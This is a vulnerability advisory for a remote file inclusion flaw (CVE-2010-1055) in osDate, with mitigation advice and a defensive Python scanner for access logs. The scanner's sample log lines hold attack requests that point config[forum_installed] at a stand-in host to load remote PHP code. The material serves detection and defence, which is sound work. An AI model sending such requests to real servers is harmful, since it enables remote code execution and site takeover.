PT-2010-2776 · Osdate · Osdate

Published 2010-03-23 · Updated 2017-08-17 · CVE-2010-1055

CVSS v2.0: 5.1 (Medium)
Vector: AV:N/AC:H/Au:N/C:P/I:P/A:P
Name of the Vulnerable Software and Affected Versions
osDate versions 2.1.9 through 2.1.9
osDate versions 2.5.4 through 2.5.4

Description
The issue allows remote attackers to execute arbitrary PHP code when magic_quotes_gpc is disabled and register_globals is enabled. This can be achieved via a URL in the config[forum_installed] parameter to API endpoints such as "forum/adminLogin.php" and "forum/userLogin.php".

Recommendations
For osDate version 2.1.9, consider disabling the config[forum_installed] parameter or restricting access to the "forum/adminLogin.php" and "forum/userLogin.php" API endpoints until a patch is available.
For osDate version 2.5.4, consider disabling the config[forum_installed] parameter or restricting access to the "forum/adminLogin.php" and "forum/userLogin.php" API endpoints until a patch is available.
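While access to the two endpoints is being restricted, web server logs can be checked for requests that match the description. The following is an added example, not part of the original advisory or of osDate: it scans access-log lines for requests to the named endpoints in which the parameter, written with its underscore as `config[forum_installed]`, carries a URL. The log format (Apache combined), the sample lines, and the rule for what counts as a URL are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoints and parameter named in the advisory.
ENDPOINTS = ("/forum/adminlogin.php", "/forum/userlogin.php")
PARAM = "config[forum_installed]"
# Assumption: any "scheme://" value is treated as a URL (http, ftp, php, ...).
URL_VALUE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)
# Request line as it appears in Apache combined log format (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP ranges, .invalid host).
SAMPLE = [
    '192.0.2.10 - - [12/Mar/2010:10:01:02 +0000] "GET /forum/userLogin.php?config[forum_installed]=http://files.example.invalid/a.txt HTTP/1.1" 200 512',
    '192.0.2.11 - - [12/Mar/2010:10:01:09 +0000] "GET /forum/adminLogin.php?config%5Bforum_installed%5D=http%3A%2F%2Ffiles.example.invalid%2Fa.txt HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Mar/2010:10:02:00 +0000] "POST /forum/userLogin.php HTTP/1.1" 302 0',
    '198.51.100.8 - - [12/Mar/2010:10:03:00 +0000] "GET /index.php?page=http://files.example.invalid/a.txt HTTP/1.1" 200 100',
]

def suspicious_value(request_target):
    """Return the parameter value if the request matches the advisory, else None."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith(ENDPOINTS):
        return None
    # parse_qsl percent-decodes names and values, so %5B/%5D brackets match too.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == PARAM and URL_VALUE.search(value):
            return value
    return None

def scan(lines):
    """Return (client, value) for every log line that matches."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        value = suspicious_value(match.group(1))
        if value is not None:
            hits.append((line.split()[0], value))
    return hits

if __name__ == "__main__":
    for client, value in scan(SAMPLE):
        print(f"{client} sent {PARAM}={value}")
```

Access logs record only the query string, so a value sent in a POST body or cookie will not appear here; a WAF or application-level log is needed to cover those.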

Exploit

Fix

Code Injection

Weakness Enumeration

Related Identifiers

CVE-2010-1055

Affected Products

Osdate